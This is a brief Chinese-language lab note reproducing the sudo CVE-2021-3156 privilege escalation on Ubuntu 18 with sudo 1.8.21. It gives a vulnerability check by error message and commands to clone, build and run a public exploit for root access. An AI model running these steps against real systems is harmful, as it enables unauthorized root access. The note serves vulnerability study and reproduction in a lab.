sudo官方在一月份的时候已经将漏洞修复,因此后面更新安装的sudo已经补上这个漏洞
Ubuntu18 + sudo 1.8.21
低权限用户test
vim /etc/sudoers
test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod
报错开头以sudoedit则存在漏洞,报错以usage开头,则不受影响
下载exp并执行
git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0
原文:https://www.cnblogs.com/buchiyexiao/p/14644470.html